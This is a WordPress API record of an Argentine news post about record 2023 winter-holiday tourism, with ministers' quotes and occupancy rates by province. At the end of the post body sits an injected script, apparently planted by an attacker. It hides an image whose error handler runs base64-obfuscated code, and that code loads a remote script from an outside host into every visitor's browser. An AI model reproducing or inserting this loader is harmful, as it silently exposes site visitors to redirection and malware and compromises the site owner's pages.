{"id":7114,"date":"2023-07-31T18:10:42","date_gmt":"2023-07-31T21:10:42","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7114"},"modified":"2025-08-13T15:56:26","modified_gmt":"2025-08-13T18:56:26","slug":"movimiento-turistico-record-en-las-vacaciones-de-invierno","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7114","title":{"rendered":"Movimiento tur\u00edstico r\u00e9cord en las vacaciones de invierno"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Massa destac\u00f3 el trabajo conjunto entre el Estado, las provincias y el sector privado. Lammens remarc\u00f3 el rol clave del turismo como generador de empleo.<\/em><\/h3>\n\n\n\n<p>M\u00e1s de\u00a0<strong>5,5 millones de turistas<\/strong>\u00a0se movilizaron durante las vacaciones de invierno, un 6,7% m\u00e1s que en 2022, que tambi\u00e9n hab\u00eda sido\u00a0<strong>r\u00e9cord<\/strong>, seg\u00fan el informe de la Confederaci\u00f3n Argentina de la Mediana Empresa (<strong>CAME<\/strong>).\u00a0<strong>El impacto econ\u00f3mico super\u00f3 los $410.633 millones<\/strong>.<\/p>\n\n\n\n<p>Entre los principales motivos de esta exitosa temporada, se destaca la llegada de&nbsp;<strong>turistas del extranjero<\/strong>, que por cuarto mes consecutivo marcar\u00e1 cifras hist\u00f3ricas. Se proyecta que en julio de 2023 ingresaron cerca de&nbsp;<strong>600 mil turistas<\/strong>&nbsp;extranjeros, con un&nbsp;<strong>impacto econ\u00f3mico de m\u00e1s de USD 400 millones<\/strong>.<\/p>\n\n\n\n<p>De acuerdo a los relevamientos del Observatorio Argentino de Turismo (<strong>OAT<\/strong>), las provincias de Salta, Santiago del Estero, Misiones, Catamarca, San Juan, y la Ciudad de Buenos Aires, tuvieron los&nbsp;<strong>mayores niveles de ocupaci\u00f3n<\/strong>. Por su parte, San Carlos de Bariloche, San Mart\u00edn de los Andes, Ushuaia, Puerto Iguaz\u00fa, Tandil, y las ciudades de Mendoza y Salta fueron los&nbsp;<strong>destinos m\u00e1s elegidos<\/strong>.<\/p>\n\n\n\n<p>El ministro de Econom\u00eda de la Naci\u00f3n,&nbsp;<strong>Sergio Massa<\/strong>, destac\u00f3: \u00ab<em>La Argentina, por destinos naturales, por recursos y por calidad de servicio, claramente es un actor competitivo desde el punto de vista tur\u00edstico. Pero eso tiene que venir acompa\u00f1ado de un rol central del Estado. Sector p\u00fablico, sector privado, Naci\u00f3n, Provincias, empresas del Estado, todos coordinados con un objetivo. Nos unimos todos aquellos que creemos que el turismo es uno de los motores vitales de desarrollo econ\u00f3mico de la Argentina<\/em>\u00ab.<\/p>\n\n\n\n<p>Por su parte, el ministro de Turismo y Deportes de la Naci\u00f3n,&nbsp;<strong>Mat\u00edas Lammens<\/strong>, asegur\u00f3: \u201c<em>Volvimos a tener un movimiento tur\u00edstico r\u00e9cord, como ya ocurri\u00f3 en el verano y en cada fin de semana largo, impulsado por PreViaje. Gracias a la llegada masiva de turistas extranjeros, con cifras por encima de la prepandemia, consolidamos unas vacaciones de invierno hist\u00f3ricas. El turismo es uno de los grandes motores del crecimiento y de la generaci\u00f3n de empleo en todos los rincones del pa\u00eds. Como sostiene el ministro Sergio Massa, el sector est\u00e1 llamado a ser una de las turbinas de desarrollo para nuestra econom\u00eda en los pr\u00f3ximos a\u00f1os<\/em>\u201d.<\/p>\n\n\n\n<p>En el mismo sentido, el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>, declar\u00f3: \u201c<em>Las proyecciones que nos daba el OAT se confirman con un movimiento tur\u00edstico que super\u00f3 incluso las expectativas en muchos de los destinos argentinos. Una temporada muy exitosa, con una gran presencia de turistas internacionales en todo el pa\u00eds. Empezamos a prepararnos ahora para impulsar el desarrollo de la industria tur\u00edstica el resto del a\u00f1o, con grandes expectativas puestas en el anuncio de una nueva edici\u00f3n de PreViaje que brinde otro gran impulso al sector<\/em>\u201d.<\/p>\n\n\n\n<p>Finalmente,&nbsp;<strong>Aerol\u00edneas Argentinas inform\u00f3 que transport\u00f3 a 800 mil pasajeros<\/strong>&nbsp;durante 15 d\u00edas de vacaciones, un 15% m\u00e1s que el mismo periodo en 2019. La aerol\u00ednea de bandera proyecta superar los 1,2 millones de personas durante julio, lo que representar\u00eda un incremento del 10% en comparaci\u00f3n con la prepandemia.<\/p>\n\n\n\n<p><strong>Invierno 2023 | Ocupaci\u00f3n en destinos<br>Datos del Observatorio Argentino de Turismo (OAT)<\/strong><\/p>\n\n\n\n<p>Salta (95% de promedio provincial)<\/p>\n\n\n\n<p>Tucum\u00e1n (75% de promedio provincial)<br>196 mil turistas en la provincia<br>-San Miguel de Tucum\u00e1n: 78%<br>-Taf\u00ed del Valle: 86%<br>-San Pedro de Colalao: 47%<br>-San Javier: 53%<br>-Yerba Buena: 8%<\/p>\n\n\n\n<p>Santiago del Estero<br>-Ciudad de Santiago del Estero: 98%<br>-Termas de R\u00edo Hondo: 92% en hoteles de 4 y 5 estrellas y 80% en los 3 estrellas<\/p>\n\n\n\n<p>Catamarca (90% de promedio provincial)<br>-Antofagasta: 100%<br>-Bel\u00e9n: 100%<br>-Fiambal\u00e1: 100%<br>-Tinogasta: 100%<br>-El Rodeo: 100%<br>-La Puerta: 100%<br>-Pacl\u00edn: 100%<br>-Andalgal\u00e1: 100%<br>-Pom\u00e1n: 100%<br>-Fray M. Esqui\u00fa: 98%<br>-Valle Viejo: 98%<br>-Capital: 95%<\/p>\n\n\n\n<p>La Rioja (90% de promedio provincial)<br>-La Rioja: 87%<br>-Chilecito: 87%<br>-Villa Uni\u00f3n: 95%<\/p>\n\n\n\n<p>Misiones (96% de promedio provincial)<br>-Puerto Iguaz\u00fa: 96%<br>-Posadas: 93%<br>-San Ignacio: 90%<br>-El Soberbio: 85%<br>-Ober\u00e1: 90%<br>-Arist\u00f3bulo del Valle: 85%<br>-Eldorado: 83%<\/p>\n\n\n\n<p>Corrientes (86% de promedio provincial)<\/p>\n\n\n\n<p>Entre R\u00edos<br>-Col\u00f3n: 80%<br>-Gualeguaych\u00fa: 85%<br>-Federaci\u00f3n: 85%<\/p>\n\n\n\n<p>Santa Fe<\/p>\n\n\n\n<p>-Melincu\u00e9: 90%<br>-Ciudad de Santa Fe: 80%<br>-Reconquista: 65%<br>-Villa Constituci\u00f3n: 95%<br>-Santa Rosa de Calchines: 65%<\/p>\n\n\n\n<p>Mendoza (85% de promedio provincial)<\/p>\n\n\n\n<p>San Juan (80% de promedio provincial)<br>-Gran San Juan: 77%<br>Calingasta: 88%<br>Iglesia: 74%<br>J\u00e1chal: 74%<br>Valle F\u00e9rtil: 88%<\/p>\n\n\n\n<p>San Luis (78% de promedio provincial)<br>-Merlo: 84%<br>-Costa de los Comechingones: 71%<br>-Potrero de los Funes: 72%<br>-San Luis y Sierras centrales: 73%<br>-San Francisco y norte puntano: 70%<\/p>\n\n\n\n<p>C\u00f3rdoba<br>-Villa Carlos Paz: 75%<\/p>\n\n\n\n<p>Buenos Aires<br>-Tandil: 89%<br>-Mar del Plata: 50%<br>-Villa Gesell: 65% (10% m\u00e1s que en 2022)<\/p>\n\n\n\n<p>Ciudad de Buenos Aires (80% de ocupaci\u00f3n)<\/p>\n\n\n\n<p>La Pampa<br>-Santa Rosa: 60%<br>-General Acha: 100% (fines de semana)<br>-Bernardo Larroud\u00e9: 80%<br>-Victorica: 80%.<br>-Eduardo Castex: 85%<br>-General Pico: 80%<br>-Intendente Alvear: 75%<br>-Catril\u00f3: 90%,<br>-Arata: 90%.<br>-Realic\u00f3: 85%<br>-La Adela: 60%.<br>-Winifreda: 95%.<\/p>\n\n\n\n<p>Neuqu\u00e9n<br>-San Mart\u00edn de los Andes: 85%<br>-Villa La Angostura: 85%<br>-Caviahue: 83%<br>-Villa Pehuenia-Moquehue: 83%<br>-Jun\u00edn de los Andes: 65%<br>-Neuqu\u00e9n Capital: 65%<\/p>\n\n\n\n<p>R\u00edo Negro<br>-San Carlos de Bariloche: 95%<br>-Dina Huapi: 85%<br>-El Bols\u00f3n: 60% (con picos de 74%)<\/p>\n\n\n\n<p>Chubut<br>-Esquel: 75% (12% m\u00e1s que en 2022)<br>-Puerto Madryn: 65%<\/p>\n\n\n\n<p>Santa Cruz<br>-El Calafate: 80%<\/p>\n\n\n\n<p>Tierra del Fuego, AIAS<br>-Ushuaia: 85%<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Massa destac\u00f3 el trabajo conjunto entre el Estado, las provincias y el sector privado. Lammens remarc\u00f3 el rol clave del turismo como generador de empleo. M\u00e1s de\u00a05,5 millones de turistas\u00a0se movilizaron durante las vacaciones de invierno, un 6,7% m\u00e1s que en 2022, que tambi\u00e9n hab\u00eda sido\u00a0r\u00e9cord, seg\u00fan el informe de la Confederaci\u00f3n Argentina de la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7115,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7114","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7114"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7114\/revisions"}],"predecessor-version":[{"id":10346,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7114\/revisions\/10346"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7115"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}